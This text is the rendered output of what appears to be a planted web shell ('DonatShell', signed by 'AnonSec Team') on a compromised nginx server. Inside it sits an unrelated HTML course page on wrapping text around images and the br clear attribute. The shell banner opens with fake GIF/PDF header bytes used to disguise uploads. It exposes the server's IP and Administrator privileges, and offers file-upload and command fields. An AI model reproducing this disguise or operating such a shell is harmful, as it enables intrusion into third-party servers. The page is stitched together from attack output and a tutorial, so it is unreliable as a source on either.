GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /nginx/html/JimMartinson/_Archive/MMDT1021/AllenSite/ch5/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /nginx/html/JimMartinson/_Archive/MMDT1021/AllenSite/ch5/chapter5p9.htm
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>


<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>MMDT1021 Chapter 5 Notes - page 9</title>

<link href="chapter5p9_files/style.css" rel="stylesheet" type="text/css"></head><body>
<p class="pagetitle" align="center">MMDT1021 Chapter 5 Notes - page 9 </p>
<p>&nbsp;</p>
<p class="sectiontitle">Wrapping text around images (Alignment)</p>
<table bgcolor="#ffffff" border="1" cellpadding="4" width="750">
  <tbody><tr>
    <th width="85%">Code</th>
    <th width="15%">Page</th>
  </tr>
  <tr>
    <td width="85%">An example page using all align values.</td>
    <td width="15%"><a href="http://mmdt1021.ridgewater.net/chapter5/examples/chapter5p9.htm"> Result</a><br>
      <a href="http://mmdt1021.ridgewater.net/chapter5/examples/chapter5p9.txt">Source</a></td>
  </tr>
</tbody></table>
<p>&nbsp;</p>
<p class="sectiontitle">Stopping Text Wrap</p>
<table bgcolor="#ffffff" border="0" cellpadding="4" cellspacing="0" width="750">
  <tbody><tr>
    <td width="100%">Without any 'clear' attribute in the &lt;br&gt; 
      tag.</td>
  </tr>
</tbody></table>
<table bgcolor="#ffffff" border="1" cellpadding="4" width="750">
  <tbody><tr>
    <th width="50%">Code</th>
    <th width="50%">Result</th>
  </tr>
  <tr valign="top">
    <td width="50%"><code>&lt;img src="images/world.jpg" border="0" width="137" height="145" 
      alt="Globe image"&nbsp; align="left" /&gt;<br>
      &lt;h1&gt;Big Text&lt;/h1&gt;<br>
      &lt;br /&gt;<br>
      This is some regular text. This is some regular text. This is some regular 
      text. This is some regular text. This is some regular text. This is some 
      regular text.</code></td>
    <td width="50%"><img src="chapter5p9_files/world.jpg" alt="Globe image" align="left" border="0" height="145" width="137">
      <h1>Big Text</h1>
      <p><br>
        This is some regular text. This is some regular text. This is some regular 
        text. This is some regular text. This is some regular text. This is some 
        regular text.</p></td>
  </tr>
</tbody></table>
<p>&nbsp; </p>
<table bgcolor="#ffffff" border="0" cellpadding="4" cellspacing="0" width="750">
  <tbody><tr>
    <td width="100%">With a 'clear' attribute in the &lt;br&gt; 
      tag between the &lt;h1&gt; tag and other text.</td>
  </tr>
</tbody></table>
<table bgcolor="#ffffff" border="1" cellpadding="4" width="750">
  <tbody><tr>
    <th width="50%">Code</th>
    <th width="50%">Result</th>
  </tr>
  <tr valign="top">
    <td width="50%"><code>&lt;img src="images/world.jpg" border="0" width="137" height="145" 
      alt="Globe image" align="left" /&gt;<br>
      &lt;h1&gt;Big Text&lt;/h1&gt;<br>
      &lt;br clear="all" /&gt;<br>
      This is some regular text. This is some regular text. This is some regular 
      text. This is some regular text. This is some regular text. This is some 
      regular text.</code></td>
    <td width="50%"><img src="chapter5p9_files/world.jpg" alt="Globe image" align="left" border="0" height="145" width="137">
      <h1>Big Text</h1>
      <p><br clear="all">
        This is some regular text. This is some regular text. This is some regular 
        text. This is some regular text. This is some regular text. This is some 
        regular text.</p></td>
  </tr>
</tbody></table>
<p>&nbsp; </p>
<table bgcolor="#ffffff" border="0" cellpadding="4" cellspacing="0" width="750">
  <tbody><tr>
    <td width="100%">With a 'clear' attribute in the &lt;br&gt; 
      tag before the &lt;h1&gt; tag.</td>
  </tr>
</tbody></table>
<table bgcolor="#ffffff" border="1" cellpadding="4" width="750">
  <tbody><tr>
    <th width="50%">Code</th>
    <th width="50%">Result</th>
  </tr>
  <tr valign="top">
    <td width="50%"><code>&lt;img src="images/world.jpg" border="0" width="137" height="145" 
      alt="Globe image" align="left" /&gt;<br>
      &lt;br clear="all" /&gt;<br>
      &lt;h1&gt;Big Text&lt;/h1&gt;<br>
      This is some regular text. This is some regular text. This is some regular 
      text. This is some regular text. This is some regular text. This is some 
      regular text.</code></td>
    <td width="50%"><img src="chapter5p9_files/world.jpg" alt="Globe image" align="left" border="0" height="145" width="137"><br clear="all">
      <h1>Big Text</h1>
      <p>This is some regular text. This is some regular text. This is some 
        regular text. This is some regular text. This is some regular text. This 
        is some regular text.</p></td>
  </tr>
</tbody></table>
</body></html>

Anon7 - 2022
AnonSec Team